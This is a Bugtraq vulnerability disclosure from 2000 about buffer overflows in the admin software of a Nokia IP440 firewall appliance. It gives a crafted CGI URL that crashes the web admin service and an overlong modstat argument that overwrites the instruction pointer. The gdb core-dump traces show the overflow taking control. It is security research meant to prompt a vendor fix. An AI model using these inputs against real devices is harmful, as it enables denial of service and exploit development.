Date: Mon, 27 Nov 2000 02:33:27 -0800
From: K2 <ktwo@KTWO.CA>
Subject: Nokia firewalls
To: BUGTRAQ@SECURITYFOCUS.COM

Hi,

Well, I just unwrapped my shiny new Nokia IP440 integrated Firewall-1/IDS appliance and thought to give it a once over. It appears to be an older fBSD kernel + some firewall (checkpoint 4.1) + some IDS (ISS) + remote admin (SSH/http).

Now these vulnerabilities all require an authenticated user; however, it's still amazing to me that a device with security as its primary function would have so many issues.

A request to its default http administration site...

http://127.0.0.1/cgi-bin/html_page?(Ax6000)&TEMPLATE=main

will result in "Html_gen exited because of signal: Segmentation fault".

After this, any attempt to connect to the site will return "Error while getting page: Couldn't connect to /tmp/xsets: No such file or directory". The /bin/xpand will die, dumping core in /var/tmp...

scrooge:/var/tmp# gdb -c xpand.core-11.27.2000-094458
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
Modified in 1997, 1998 by Nokia IP Inc.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.13 (i386-unknown-freebsd), Copyright 1994 Free Software Foundation, Inc.
Core was generated by `xpand'.
Program terminated with signal 11, Segmentation fault.
#0  0x10046fb6 in ?? (41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
(gdb) file xpand-11.27.2000-094458
Reading symbols from xpand-11.27.2000-094458...done.
(gdb) bt
#0  0x10046fb6 in end (41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
#1  0xefbfd3b8 in end (41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
#2  0x10047110 in end (7d380, 41414141, 1004f060, 36158, 33b18, efbfd3f0, 100446df, 7cb40)
#3  0x10044233 in end (7cb40, 41414141, 41414141, 0, 1004f060, efbfd408, 1004416c, 5fec0)
#4  0x100446df in end (5fec0, 41414141, 41414141, 1004f060, efbfd42c, 1004732e, 3a020, efbfd444)
#5  0x1004416c in end (3a020, efbfd444, 1004f060, 5fec0, 31680, 0, 56, efbfd44c)
#6  0x1004732e in end (321a0, 10044144, efbfd444, 1004f060, 100446bc, 5fec0, efbfd46c, 10044713)
#7  0x100441ac in end (332a0, 100446bc, 5fec0, efbfd4b0, 7f0c0, 0, efbfd65c, 21983)
#8  0x10044713 in end (31680, 10013, 17a7, 66000, 0, 0, 0, 0)
#9  0x21983 in handle_template_request (d=0x34000, request=0x66000 "USER admin\n", 'A' <repeats 189 times>..., request_len=6055, fd=9, fd_af=1, 1004f060, 40f40, 654b0) at xcommit.c:1053
#10 0x22d6a in stream_set (fdi=0x654a0, 1004f060, 1, 654b0, 0, 6b64632f, 62696c00, 40) at xpand.c:179
#11 0x10041491 in end (0, 1, 0, 38000, efbfda60, 23354, 1, 0)
#12 0x10046ec0 in end (1, 0, efbfda88, efbfda84, 0, 654a0, 29000, d)
---Type <return> to continue, or q <return> to quit---
#13 0x23354 in main (argc=1, argv=0xefbfda88, efbfda90, 0, 0, 29000, 0, 1) at xpand.c:385
(gdb) info reg
eax            0x41414141       1094795585
ecx            0x41414141       1094795585
edx            0x0              0
ebx            0x1004f060       268759136
esp            0xefbfd394       0xefbfd394
ebp            0xefbfd394       0xefbfd394
esi            0x7d380          512896
edi            0x41414141       1094795585
eip            0x10046fb6       0x10046fb6
ps             0x10206          66054
cs             0x1f             31
ss             0x27             39
ds             0xefbf0027       -272695257
es             0x80027          524327
(gdb)

also....

scrooge:/var/tmp# gdb -c html_gen.core
(gdb) info reg
eax            0x88dc           35036
ecx            0xfffffffc       -4
edx            0x4949           18761
ebx            0x1009b060       269070432
esp            0xefbfaa74       0xefbfaa74
ebp            0xefbfaa84       0xefbfaa84
esi            0x0              0
edi            0x41414141       1094795585
eip            0x10084d1b       0x10084d1b
ps             0x10216          66070
cs             0x1f             31
ss             0x27             39
ds             0x27             39
es             0x27             39
(gdb)

also,

scrooge:/var/tmp# ./modstat -n AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Type    Id Off Loadaddr Size Info     Rev Module Name
modstat: LMSTAT: Bad file descriptor
Segmentation fault (core dumped)
(gdb) info reg
eax            0x4              4
ecx            0xefbfcfb8       -272642120
edx            0xefbfcfb8       -272642120
ebx            0x0              0
esp            0xefbfd354       0xefbfd354
ebp            0x41414141       0x41414141
esi            0xffffffff       -1
edi            0x3              3
eip            0x41414141       0x41414141

Anyhow, I just thought they may want to clean these things up...

K2